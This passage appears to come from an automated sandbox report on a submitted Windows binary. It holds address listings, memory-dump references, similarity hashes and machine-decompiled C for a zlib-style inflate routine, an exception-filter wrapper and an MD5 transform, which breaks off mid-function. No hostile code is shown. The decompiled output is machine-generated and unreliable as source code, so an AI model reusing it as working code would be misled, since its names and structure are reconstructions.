                                        0x00000000
                                        0x00000000
                                        0x00410274
                                        0x00410274
                                        0x00410278
                                        0x00410279
                                        0x0041027b
                                        0x0041027d
                                        0x0041027d
                                        0x0041027d
                                        0x00000000
                                        0x0041034c
                                        0x0041034c
                                        0x00410350
                                        0x004103cc
                                        0x004103cc
                                        0x00000000
                                        0x00410352
                                        0x00410352
                                        0x00410352
                                        0x00410356
                                        0x00000000
                                        0x00410358
                                        0x00410358
                                        0x00410358
                                        0x0041035b
                                        0x00410383
                                        0x00410383
                                        0x00410386
                                        0x004103c4
                                        0x004103c4
                                        0x004103c6
                                        0x004103c6
                                        0x004103c8
                                        0x00000000
                                        0x00410388
                                        0x00410388
                                        0x00410388
                                        0x0041038c
                                        0x00410393
                                        0x00000000
                                        0x00410393
                                        0x00410360
                                        0x00000000
                                        0x00410360
                                        0x00410360
                                        0x00410360
                                        0x00410362
                                        0x00000000
                                        0x00000000
                                        0x00410368
                                        0x00410368
                                        0x0041036b
                                        0x0041036d
                                        0x0041036f
                                        0x00410370
                                        0x00410372
                                        0x00410376
                                        0x00410379
                                        0x0041037d
                                        0x0041037e
                                        0x00410381
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00410381
                                        0x00000000
                                        0x00410360
                                        0x0041035b
                                        0x00410356
                                        0x00000000
                                        0x00000000
                                        0x004103d2
                                        0x004103d2
                                        0x00000000
                                        0x00000000
                                        0x004103df
                                        0x004103df
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040ef30
                                        0x0040f855
                                        0x0040f861
                                        0x0040f861
                                        0x0040f8f4
                                        0x0040f8f4
                                        0x0040f8f4
                                        0x0040f8f7
                                        0x00000000
                                        0x0040f900
                                        0x00000000
                                        0x0040f900
                                        0x0040f900
                                        0x0040f902
                                        0x00000000
                                        0x00000000
                                        0x0040f908
                                        0x0040f90d
                                        0x0040f90f
                                        0x0040f910
                                        0x0040f912
                                        0x0040f916
                                        0x0040f919
                                        0x0040f91d
                                        0x0040f921
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040f921
                                        0x00000000
                                        0x0040f900
                                        0x00000000
                                        0x0040f923
                                        0x0040f928
                                        0x0040f92b
                                        0x0040f92e
                                        0x0040f931
                                        0x0040f93d
                                        0x0040f942
                                        0x0040f948
                                        0x00000000
                                        0x0040f8f4
                                        0x0040f8f2
                                        0x0040f8d9
                                        0x00000000
                                        0x0040f8cf

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID: hAA
                                        • API String ID: 0-1362906312
                                        • Opcode ID: b870c5d494b817d9591975b72a661bca65ff69ded891ef8f90a4b337e752386f
                                        • Instruction ID: 1d26dd42d67a379f06d3d0db34588ac5c764d5a1fc6cdf53190fcc8a311b9f6b
                                        • Opcode Fuzzy Hash: b870c5d494b817d9591975b72a661bca65ff69ded891ef8f90a4b337e752386f
                                        • Instruction Fuzzy Hash: A362CF716047129FC728CF18C4906AAB7E1FFC8304F144A3EE8959BB81D779E85ACB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004118F0, Relevance: 1.6, Strings: 1, Instructions: 383COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004118F0() {
				intOrPtr _t148;
				signed int _t165;
				intOrPtr _t175;
				signed int _t187;
				void* _t189;
				signed int _t190;
				intOrPtr _t195;
				signed int _t202;
				char _t204;
				char _t207;
				intOrPtr _t208;
				char _t209;
				char _t212;
				intOrPtr* _t213;
				signed char* _t215;
				signed char* _t219;
				signed int _t236;
				intOrPtr _t248;
				unsigned int _t249;
				intOrPtr _t251;
				unsigned int _t254;
				intOrPtr* _t256;
				signed char _t263;
				intOrPtr* _t265;
				signed char _t269;
				signed char _t270;
				signed char* _t272;
				void* _t274;
				void* _t276;
				intOrPtr _t277;
				signed char _t279;
				signed char _t284;
				signed char _t287;
				signed char _t292;
				signed char* _t294;
				signed int _t295;
				void* _t296;
				signed char* _t297;
				signed char _t298;
				signed char _t299;
				signed char _t300;
				signed char _t301;
				signed char _t302;
				void* _t305;
				signed char _t308;
				signed char* _t309;
				signed char* _t310;
				unsigned int _t311;
				void* _t315;
				signed char* _t316;
				void* _t318;
				char* _t322;
				signed int _t323;
				signed int _t324;
				void* _t325;

				_t256 =  *((intOrPtr*)(_t325 + 0x4c));
				_t248 =  *((intOrPtr*)(_t256 + 0x1c));
				_t294 =  *_t256 - 1;
				_t323 =  *(_t248 + 0x3c);
				 *((intOrPtr*)(_t325 + 0x38)) =  *((intOrPtr*)(_t256 + 4)) + 0xfffffffb + _t294;
				_t322 =  *((intOrPtr*)(_t256 + 0xc)) - 1;
				_t148 =  *((intOrPtr*)(_t256 + 0x10));
				 *((intOrPtr*)(_t325 + 0x1c)) = _t248;
				 *((intOrPtr*)(_t325 + 0x14)) = _t148 + 0xfffffeff + _t322;
				 *((intOrPtr*)(_t325 + 0x30)) =  *((intOrPtr*)(_t248 + 0x28));
				 *((intOrPtr*)(_t325 + 0x44)) =  *((intOrPtr*)(_t248 + 0x2c));
				 *((intOrPtr*)(_t325 + 0x20)) =  *((intOrPtr*)(_t248 + 0x30));
				 *((intOrPtr*)(_t325 + 0x34)) =  *((intOrPtr*)(_t248 + 0x34));
				 *((intOrPtr*)(_t325 + 0x28)) =  *((intOrPtr*)(_t248 + 0x4c));
				 *((intOrPtr*)(_t325 + 0x2c)) =  *((intOrPtr*)(_t248 + 0x50));
				 *(_t325 + 0x18) = 1;
				 *((intOrPtr*)(_t325 + 0x40)) = _t148 -  *(_t325 + 0x50) + _t322;
				 *(_t325 + 0x18) =  *(_t325 + 0x18) <<  *(_t248 + 0x54);
				 *(_t325 + 0x18) =  *(_t325 + 0x18) - 1;
				 *(_t325 + 0x10) = _t294;
				_t311 =  *(_t248 + 0x38);
				 *(_t325 + 0x3c) = (1 <<  *(_t248 + 0x58)) - 1;
				do {
					if(_t323 < 0xf) {
						_t297 =  &(_t294[2]);
						 *(_t325 + 0x10) = _t297;
						_t311 = _t311 + ((_t294[1] & 0x000000ff) << _t323) + (( *_t297 & 0x000000ff) << _t323 + 8);
						_t323 = _t323 + 0x10;
					}
					_t249 =  *( *((intOrPtr*)(_t325 + 0x28)) + ( *(_t325 + 0x18) & _t311) * 4);
					_t263 = _t249 >> 0x00000008 & 0x000000ff;
					_t311 = _t311 >> _t263;
					_t323 = _t323 - _t263;
					_t295 = _t249 & 0x000000ff;
					if(_t249 == 0) {
						L7:
						_t322 = _t322 + 1;
						 *_t322 = _t249 >> 0x10;
						L47:
						_t294 =  *(_t325 + 0x10);
						_t251 =  *((intOrPtr*)(_t325 + 0x14));
						if(_t294 >=  *((intOrPtr*)(_t325 + 0x38))) {
							L62:
							_t165 = _t323 >> 3;
							_t296 = _t294 - _t165;
							_t324 = _t323 - (_t165 << 3);
							_t265 =  *((intOrPtr*)(_t325 + 0x4c));
							 *_t265 = _t296 + 1;
							 *((intOrPtr*)(_t265 + 0xc)) = _t322 + 1;
							 *((intOrPtr*)(_t265 + 4)) =  *((intOrPtr*)(_t325 + 0x38)) - _t296 + 5;
							_t175 =  *((intOrPtr*)(_t325 + 0x1c));
							 *((intOrPtr*)(_t265 + 0x10)) = _t251 - _t322 + 0x101;
							 *(_t175 + 0x38) = _t311 & (0x00000001 << _t324) - 0x00000001;
							 *(_t175 + 0x3c) = _t324;
							return _t175;
						}
						goto L48;
					}
					while((_t295 & 0x00000010) == 0) {
						if((_t295 & 0x00000040) != 0) {
							_t213 =  *((intOrPtr*)(_t325 + 0x1c));
							_t251 =  *((intOrPtr*)(_t325 + 0x14));
							_t294 =  *(_t325 + 0x10);
							if((_t295 & 0x00000020) == 0) {
								 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid literal/length code";
								L61:
								 *_t213 = 0x1d;
								goto L62;
							}
							 *_t213 = 0xb;
							goto L62;
						}
						_t249 =  *( *((intOrPtr*)(_t325 + 0x28)) + (((0x00000001 << _t295) - 0x00000001 & _t311) + (_t249 >> 0x10)) * 4);
						_t292 = _t249 >> 0x00000008 & 0x000000ff;
						_t311 = _t311 >> _t292;
						_t323 = _t323 - _t292;
						_t295 = _t249 & 0x000000ff;
						if(_t249 != 0) {
							continue;
						}
						goto L7;
					}
					_t254 = _t249 >> 0x10;
					_t298 = _t295 & 0x0000000f;
					if(_t298 != 0) {
						_t287 = _t298;
						_t236 = (0x00000001 << _t287) - 0x00000001 & _t311;
						_t311 = _t311 >> _t287;
						_t254 = _t254 + _t236;
						_t323 = _t323 - _t298;
					}
					if(_t323 < 0xf) {
						_t309 =  *(_t325 + 0x10);
						_t310 =  &(_t309[2]);
						 *(_t325 + 0x10) = _t310;
						_t311 = _t311 + ((_t309[1] & 0x000000ff) << _t323) + (( *_t310 & 0x000000ff) << _t323 + 8);
						_t323 = _t323 + 0x10;
					}
					_t299 =  *( *((intOrPtr*)(_t325 + 0x2c)) + ( *(_t325 + 0x3c) & _t311) * 4);
					_t269 = _t299 >> 0x00000008 & 0x000000ff;
					 *(_t325 + 0x50) = _t299;
					_t323 = _t323 - _t269;
					_t300 = _t299 & 0x000000ff;
					_t311 = _t311 >> _t269;
					if((_t300 & 0x00000010) != 0) {
						L17:
						 *(_t325 + 0x50) =  *(_t325 + 0x50) >> 0x10;
						_t301 = _t300 & 0x0000000f;
						if(_t323 < _t301) {
							_t279 = _t323;
							_t215 =  &(( *(_t325 + 0x10))[1]);
							_t323 = _t323 + 8;
							 *(_t325 + 0x10) = _t215;
							_t311 = _t311 + (( *_t215 & 0x000000ff) << _t279);
							if(_t323 < _t301) {
								_t219 =  &(( *(_t325 + 0x10))[1]);
								 *(_t325 + 0x10) = _t219;
								_t311 = _t311 + (( *_t219 & 0x000000ff) << _t323);
								_t323 = _t323 + 8;
							}
						}
						_t270 = _t301;
						_t323 = _t323 - _t301;
						_t187 = (0x00000001 << _t270) - 0x00000001 & _t311;
						_t311 = _t311 >> _t270;
						 *(_t325 + 0x50) =  *(_t325 + 0x50) + _t187;
						_t189 = _t322 -  *((intOrPtr*)(_t325 + 0x40));
						_t302 =  *(_t325 + 0x50);
						 *(_t325 + 0x24) = _t311;
						if(_t302 <= _t189) {
							_t272 = _t322 - _t302;
							do {
								_t190 = _t272[1] & 0x000000ff;
								_t272 =  &(_t272[3]);
								 *(_t322 + 1) = _t190;
								_t254 = _t254 - 3;
								 *(_t322 + 2) =  *(_t272 - 1) & 0x000000ff;
								_t322 = _t322 + 3;
								 *_t322 =  *_t272 & 0x000000ff;
							} while (_t254 > 2);
							if(_t254 != 0) {
								_t322 = _t322 + 1;
								 *_t322 = _t272[1];
								if(_t254 > 1) {
									_t322 = _t322 + 1;
									 *_t322 = _t272[2];
								}
							}
							goto L47;
						} else {
							_t274 = _t302 - _t189;
							if(_t274 <=  *((intOrPtr*)(_t325 + 0x44))) {
								L23:
								_t195 =  *((intOrPtr*)(_t325 + 0x20));
								_t315 =  *((intOrPtr*)(_t325 + 0x34)) - 1;
								if(_t195 != 0) {
									if(_t195 >= _t274) {
										_t316 = _t315 + _t195 - _t274;
										if(_t274 >= _t254) {
											L40:
											if(_t254 <= 2) {
												L43:
												if(_t254 != 0) {
													_t322 = _t322 + 1;
													 *_t322 = _t316[1];
													if(_t254 > 1) {
														_t322 = _t322 + 1;
														 *_t322 = _t316[2];
													}
												}
												_t311 =  *(_t325 + 0x24);
												goto L47;
											}
											_t305 = (0xaaaaaaab * (_t254 - 3) >> 0x20 >> 1) + 1;
											do {
												_t254 = _t254 - 3;
												 *(_t322 + 1) = _t316[1] & 0x000000ff;
												_t202 = _t316[2] & 0x000000ff;
												_t316 =  &(_t316[3]);
												 *(_t322 + 2) = _t202;
												_t322 = _t322 + 3;
												 *_t322 =  *_t316 & 0x000000ff;
												_t305 = _t305 - 1;
											} while (_t305 != 0);
											goto L43;
										}
										_t254 = _t254 - _t274;
										do {
											_t204 = _t316[1];
											_t316 =  &(_t316[1]);
											_t322 = _t322 + 1;
											 *_t322 = _t204;
											_t274 = _t274 - 1;
										} while (_t274 != 0);
										L39:
										_t316 = _t322 - _t302;
										goto L40;
									}
									_t276 = _t274 -  *((intOrPtr*)(_t325 + 0x20));
									_t316 = _t315 + _t195 - _t274 +  *((intOrPtr*)(_t325 + 0x30));
									if(_t276 >= _t254) {
										goto L40;
									}
									_t254 = _t254 - _t276;
									_t318 = _t316 - _t322;
									do {
										_t207 =  *((intOrPtr*)(_t318 + _t322 + 1));
										_t322 = _t322 + 1;
										 *_t322 = _t207;
										_t276 = _t276 - 1;
									} while (_t276 != 0);
									_t208 =  *((intOrPtr*)(_t325 + 0x20));
									_t316 =  *((intOrPtr*)(_t325 + 0x34)) - 1;
									if(_t208 >= _t254) {
										goto L40;
									}
									_t277 = _t208;
									_t254 = _t254 - _t208;
									do {
										_t209 = _t316[1];
										_t316 =  &(_t316[1]);
										_t322 = _t322 + 1;
										 *_t322 = _t209;
										_t277 = _t277 - 1;
									} while (_t277 != 0);
									goto L39;
								}
								_t316 = _t315 +  *((intOrPtr*)(_t325 + 0x30)) - _t274;
								if(_t274 >= _t254) {
									goto L40;
								}
								_t254 = _t254 - _t274;
								do {
									_t212 = _t316[1];
									_t316 =  &(_t316[1]);
									_t322 = _t322 + 1;
									 *_t322 = _t212;
									_t274 = _t274 - 1;
								} while (_t274 != 0);
								goto L39;
							}
							_t213 =  *((intOrPtr*)(_t325 + 0x1c));
							if( *((intOrPtr*)(_t213 + 0x1bc0)) != 0) {
								 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid distance too far back";
								goto L60;
							}
							goto L23;
						}
					} else {
						while((_t300 & 0x00000040) == 0) {
							_t308 =  *( *((intOrPtr*)(_t325 + 0x2c)) + (((0x00000001 << _t300) - 0x00000001 & _t311) + ( *(_t325 + 0x50) >> 0x10)) * 4);
							_t284 = _t308 >> 0x00000008 & 0x000000ff;
							 *(_t325 + 0x50) = _t308;
							_t323 = _t323 - _t284;
							_t300 = _t308 & 0x000000ff;
							_t311 = _t311 >> _t284;
							if((_t300 & 0x00000010) == 0) {
								continue;
							}
							goto L17;
						}
						_t213 =  *((intOrPtr*)(_t325 + 0x1c));
						 *( *((intOrPtr*)(_t325 + 0x4c)) + 0x18) = "invalid distance code";
						L60:
						_t251 =  *((intOrPtr*)(_t325 + 0x14));
						_t294 =  *(_t325 + 0x10);
						goto L61;
					}
					L48:
				} while (_t322 < _t251);
				goto L62;
			}


























































                                        0x004118f7
                                        0x004118fb
                                        0x00411903
                                        0x0041190c
                                        0x0041190f
                                        0x00411913
                                        0x00411914
                                        0x00411924
                                        0x00411928
                                        0x00411931
                                        0x00411938
                                        0x0041193f
                                        0x00411946
                                        0x0041194d
                                        0x00411954
                                        0x0041195d
                                        0x00411961
                                        0x00411968
                                        0x0041196f
                                        0x00411976
                                        0x0041197a
                                        0x0041197d
                                        0x00411981
                                        0x00411984
                                        0x0041198e
                                        0x00411993
                                        0x0041199f
                                        0x004119a1
                                        0x004119a1
                                        0x004119ae
                                        0x004119b6
                                        0x004119b9
                                        0x004119bb
                                        0x004119bd
                                        0x004119c2
                                        0x004119fd
                                        0x004119fd
                                        0x00411a01
                                        0x00411c1a
                                        0x00411c1a
                                        0x00411c1e
                                        0x00411c26
                                        0x00411cc8
                                        0x00411ccc
                                        0x00411ccf
                                        0x00411cd4
                                        0x00411cdf
                                        0x00411ce9
                                        0x00411cee
                                        0x00411d00
                                        0x00411d03
                                        0x00411d07
                                        0x00411d0a
                                        0x00411d0f
                                        0x00411d17
                                        0x00411d17
                                        0x00000000
                                        0x00411c26
                                        0x004119c4
                                        0x004119cc
                                        0x00411c78
                                        0x00411c7f
                                        0x00411c83
                                        0x00411c87
                                        0x00411c95
                                        0x00411cc2
                                        0x00411cc2
                                        0x00000000
                                        0x00411cc2
                                        0x00411c89
                                        0x00000000
                                        0x00411c89
                                        0x004119e7
                                        0x004119ef
                                        0x004119f2
                                        0x004119f4
                                        0x004119f6
                                        0x004119fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004119fb
                                        0x00411a08
                                        0x00411a0b
                                        0x00411a0e
                                        0x00411a29
                                        0x00411a33
                                        0x00411a35
                                        0x00411a37
                                        0x00411a39
                                        0x00411a39
                                        0x00411a3e
                                        0x00411a40
                                        0x00411a4a
                                        0x00411a54
                                        0x00411a5d
                                        0x00411a5f
                                        0x00411a5f
                                        0x00411a6c
                                        0x00411a74
                                        0x00411a77
                                        0x00411a7b
                                        0x00411a7d
                                        0x00411a80
                                        0x00411a85
                                        0x00411ac4
                                        0x00411ac4
                                        0x00411ac9
                                        0x00411ace
                                        0x00411ad4
                                        0x00411ad6
                                        0x00411ad7
                                        0x00411ada
                                        0x00411ae3
                                        0x00411ae7
                                        0x00411aef
                                        0x00411af0
                                        0x00411af9
                                        0x00411afb
                                        0x00411afb
                                        0x00411ae7
                                        0x00411afe
                                        0x00411b07
                                        0x00411b0a
                                        0x00411b0c
                                        0x00411b0e
                                        0x00411b14
                                        0x00411b18
                                        0x00411b1c
                                        0x00411b22
                                        0x00411c3b
                                        0x00411c40
                                        0x00411c40
                                        0x00411c44
                                        0x00411c47
                                        0x00411c4a
                                        0x00411c51
                                        0x00411c54
                                        0x00411c5a
                                        0x00411c5c
                                        0x00411c63
                                        0x00411c68
                                        0x00411c69
                                        0x00411c6e
                                        0x00411c73
                                        0x00411c74
                                        0x00411c74
                                        0x00411c6e
                                        0x00000000
                                        0x00411b28
                                        0x00411b2a
                                        0x00411b30
                                        0x00411b43
                                        0x00411b47
                                        0x00411b4b
                                        0x00411b4e
                                        0x00411b70
                                        0x00411bb1
                                        0x00411bb5
                                        0x00411bd0
                                        0x00411bd3
                                        0x00411c01
                                        0x00411c03
                                        0x00411c08
                                        0x00411c09
                                        0x00411c0e
                                        0x00411c13
                                        0x00411c14
                                        0x00411c14
                                        0x00411c0e
                                        0x00411c16
                                        0x00000000
                                        0x00411c16
                                        0x00411be1
                                        0x00411be2
                                        0x00411be6
                                        0x00411be9
                                        0x00411bec
                                        0x00411bf0
                                        0x00411bf3
                                        0x00411bf6
                                        0x00411bfc
                                        0x00411bfe
                                        0x00411bfe
                                        0x00000000
                                        0x00411be2
                                        0x00411bb7
                                        0x00411bc0
                                        0x00411bc0
                                        0x00411bc3
                                        0x00411bc6
                                        0x00411bc7
                                        0x00411bc9
                                        0x00411bc9
                                        0x00411bcc
                                        0x00411bce
                                        0x00000000
                                        0x00411bce
                                        0x00411b74
                                        0x00411b7c
                                        0x00411b80
                                        0x00000000
                                        0x00000000
                                        0x00411b82
                                        0x00411b84
                                        0x00411b86
                                        0x00411b86
                                        0x00411b8a
                                        0x00411b8b
                                        0x00411b8d
                                        0x00411b8d
                                        0x00411b94
                                        0x00411b98
                                        0x00411b9b
                                        0x00000000
                                        0x00000000
                                        0x00411b9d
                                        0x00411b9f
                                        0x00411ba1
                                        0x00411ba1
                                        0x00411ba4
                                        0x00411ba7
                                        0x00411ba8
                                        0x00411baa
                                        0x00411baa
                                        0x00000000
                                        0x00411bad
                                        0x00411b56
                                        0x00411b5a
                                        0x00000000
                                        0x00000000
                                        0x00411b5c
                                        0x00411b60
                                        0x00411b60
                                        0x00411b63
                                        0x00411b66
                                        0x00411b67
                                        0x00411b69
                                        0x00411b69
                                        0x00000000
                                        0x00411b6c
                                        0x00411b32
                                        0x00411b3d
                                        0x00411cb3
                                        0x00000000
                                        0x00411cb3
                                        0x00000000
                                        0x00411b3d
                                        0x00411a87
                                        0x00411a87
                                        0x00411aa9
                                        0x00411ab1
                                        0x00411ab4
                                        0x00411ab8
                                        0x00411aba
                                        0x00411abd
                                        0x00411ac2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00411ac2
                                        0x00411ca2
                                        0x00411ca6
                                        0x00411cba
                                        0x00411cba
                                        0x00411cbe
                                        0x00000000
                                        0x00411cbe
                                        0x00411c2c
                                        0x00411c2c
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID: hAA
                                        • API String ID: 0-1362906312
                                        • Opcode ID: 43ae337c24da3f30ba37ac385b2e312be5ae8253c335c0e9190cab62b9e9c57f
                                        • Instruction ID: a72d980c702f24fc53c344addb2bd89438d9cdf2f629da550d756bd8affcb137
                                        • Opcode Fuzzy Hash: 43ae337c24da3f30ba37ac385b2e312be5ae8253c335c0e9190cab62b9e9c57f
                                        • Instruction Fuzzy Hash: 14D1C9716083528FC704CF28C49026ABBE2EFD5344F144A5EE9D5CB352E379D986CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409F70, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409F70() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter( *0x418158);
				 *0x418158 = 0;
				return _t1;
			}




                                        0x00409f76
                                        0x00409f7c
                                        0x00409f86

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070), ref: 00409F76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                                        • Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
                                        • Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                                        • Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040CEB8, Relevance: .7, Instructions: 674COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0040CEB8() {
				signed int* _t109;
				signed int _t111;
				intOrPtr _t328;
				signed int _t329;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t357;
				signed int _t359;
				signed int _t521;
				signed int _t526;
				signed int _t530;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t541;
				signed int _t544;
				signed char* _t546;
				signed int _t550;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t562;
				signed int _t564;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t577;
				signed int _t579;
				signed int _t581;
				signed int _t583;
				signed int _t586;
				void* _t587;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t605;
				signed int _t608;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t618;
				signed int _t620;
				signed int _t622;
				intOrPtr* _t623;
				signed int* _t624;
				signed int _t625;
				signed int _t628;
				signed int _t630;
				signed int _t632;
				signed int _t634;
				signed int _t639;
				signed int _t641;
				signed int _t643;
				signed int _t651;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t666;
				signed int _t671;
				signed int _t674;
				signed int _t677;
				signed int _t685;
				signed int _t688;
				signed int _t691;
				void* _t692;

				_t109 =  *(_t692 + 0x54);
				_t546 =  *((intOrPtr*)(_t692 + 0x58)) + 2;
				_t329 = _t109[1];
				_t671 = _t109[2];
				 *(_t692 + 0x14) =  *_t109;
				_t624 = _t692 + 0x24;
				 *(_t692 + 0x18) = _t109[3];
				_t587 = 0x10;
				do {
					_t359 = _t546[1] & 0x000000ff;
					_t111 =  *_t546 & 0x000000ff;
					_t546 =  &(_t546[4]);
					 *_t624 = ((_t359 << 0x00000008 | _t111) << 0x00000008 |  *(_t546 - 5) & 0x000000ff) << 0x00000008 |  *(_t546 - 6) & 0x000000ff;
					_t624 =  &(_t624[1]);
					_t587 = _t587 - 1;
				} while (_t587 != 0);
				_t625 =  *(_t692 + 0x14);
				asm("rol edx, 0x7");
				_t550 =  *((intOrPtr*)(_t692 + 0x10)) + 0xd76aa478 + ( !_t329 & _t625 | _t671 & _t329) +  *((intOrPtr*)(_t692 + 0x20)) + _t329;
				asm("rol esi, 0xc");
				_t628 = _t625 + 0xe8c7b756 + ( !_t550 & _t671 | _t329 & _t550) +  *(_t692 + 0x24) + _t550;
				asm("ror edi, 0xf");
				_t590 = _t671 + 0x242070db + ( !_t628 & _t329 | _t628 & _t550) +  *((intOrPtr*)(_t692 + 0x28)) + _t628;
				asm("ror ebx, 0xa");
				_t332 = _t329 + 0xc1bdceee + ( !_t590 & _t550 | _t628 & _t590) +  *((intOrPtr*)(_t692 + 0x2c)) + _t590;
				asm("rol edx, 0x7");
				_t552 = _t550 + ( !_t332 & _t628 | _t590 & _t332) + 0xf57c0faf +  *((intOrPtr*)(_t692 + 0x30)) + _t332;
				asm("rol esi, 0xc");
				_t630 = _t628 + ( !_t552 & _t590 | _t332 & _t552) + 0x4787c62a +  *((intOrPtr*)(_t692 + 0x34)) + _t552;
				asm("ror edi, 0xf");
				_t592 = _t590 + ( !_t630 & _t332 | _t630 & _t552) + 0xa8304613 +  *((intOrPtr*)(_t692 + 0x38)) + _t630;
				asm("ror ebx, 0xa");
				_t334 = _t332 + ( !_t592 & _t552 | _t630 & _t592) + 0xfd469501 +  *((intOrPtr*)(_t692 + 0x3c)) + _t592;
				asm("rol edx, 0x7");
				_t554 = _t552 + ( !_t334 & _t630 | _t592 & _t334) + 0x698098d8 +  *((intOrPtr*)(_t692 + 0x40)) + _t334;
				_t27 = _t554 + 0x6b901122; // -1809486614
				asm("rol esi, 0xc");
				_t632 = _t630 + ( !_t554 & _t592 | _t334 & _t554) + 0x8b44f7af +  *((intOrPtr*)(_t692 + 0x44)) + _t554;
				asm("ror ebp, 0xf");
				_t674 = _t592 - 0xa44f + ( !_t632 & _t334 | _t632 & _t554) +  *((intOrPtr*)(_t692 + 0x48)) + _t632;
				 *(_t692 + 0x14) = _t674;
				asm("ror ebx, 0xa");
				_t336 = _t334 + ( !_t674 & _t554 | _t632 & _t674) + 0x895cd7be +  *((intOrPtr*)(_t692 + 0x4c)) + _t674;
				 *(_t692 + 0x18) = _t336;
				asm("rol edi, 0x7");
				_t595 = _t27 + ( !_t336 & _t632 | _t674 & _t336) +  *((intOrPtr*)(_t692 + 0x50)) + _t336;
				 *(_t692 + 0x1c) = _t595;
				asm("rol ebp, 0xc");
				_t677 = _t632 - 0x2678e6d +  *(_t692 + 0x54) + ( !_t595 & _t674 | _t336 & _t595) + _t595;
				_t634 =  !_t677;
				asm("ror ebx, 0xf");
				_t340 =  *(_t692 + 0x14) + 0xa679438e + (_t634 & _t336 | _t677 & _t595) +  *((intOrPtr*)(_t692 + 0x58)) + _t677;
				_t556 =  !_t340;
				asm("ror edi, 0xa");
				_t599 =  *(_t692 + 0x18) + 0x49b40821 + (_t556 & _t595 | _t677 & _t340) +  *((intOrPtr*)(_t692 + 0x5c)) + _t340;
				asm("rol esi, 0x5");
				_t639 = (_t634 & _t340 | _t677 & _t599) +  *(_t692 + 0x24) +  *(_t692 + 0x1c) + 0xf61e2562 + _t599;
				asm("rol edx, 0x9");
				_t562 = (_t556 & _t599 | _t340 & _t639) + 0xc040b340 +  *((intOrPtr*)(_t692 + 0x38)) + _t677 + _t639;
				asm("rol ebx, 0xe");
				_t342 = _t340 + ( !_t599 & _t639 | _t562 & _t599) + 0x265e5a51 +  *((intOrPtr*)(_t692 + 0x4c)) + _t562;
				asm("ror edi, 0xc");
				_t601 = _t599 + ( !_t639 & _t562 | _t342 & _t639) + 0xe9b6c7aa +  *((intOrPtr*)(_t692 + 0x20)) + _t342;
				asm("rol esi, 0x5");
